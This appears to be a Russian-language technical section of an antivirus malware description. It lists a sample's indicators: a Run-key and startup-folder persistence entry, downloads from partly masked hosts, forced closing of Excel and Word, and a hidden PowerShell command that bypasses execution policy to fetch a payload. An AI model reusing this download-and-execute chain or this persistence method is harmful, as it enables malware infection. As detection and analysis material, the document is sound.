Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '52UBS6GCDO' = '"%TEMP%\jhonpc.js"'
- %APPDATA%\microsoft\windows\start menu\programs\startup\jhonpc.js
- http://fo###p.com.br/download/file.php?id### как %temp%\jhon.exe
- http://fo###p.com.br/download/file.php?id### как %temp%\jhonpc.js
- '<SYSTEM32>\taskkill.exe' /f /im excel.exe
- '<SYSTEM32>\taskkill.exe' /f /im winword.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFi...
- %TEMP%\jhonpc.js
- %TEMP%\jhon.exe
- %TEMP%\rundll.exe
- http://fo###p.com.br/download/file.php?id###
- http://bo####.duckdns.org:8888/Vre
- DNS ASK fo###p.com.br
- DNS ASK ru##.ddns.net
- DNS ASK bo####.duckdns.org
- DNS ASK 55####.duckdns.org
- ClassName: '' WindowName: ''
- '<SYSTEM32>\wscript.exe' "%TEMP%\jhonpc.js"
- '%TEMP%\jhon.exe'
- '%TEMP%\rundll.exe'
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im excel.exe & taskkill /f /im winword.exe & ping -n 3 localhost & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFi...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\ping.exe' -n 3 localhost
- '<SYSTEM32>\wscript.exe' "%TEMP%\jhonpc.js"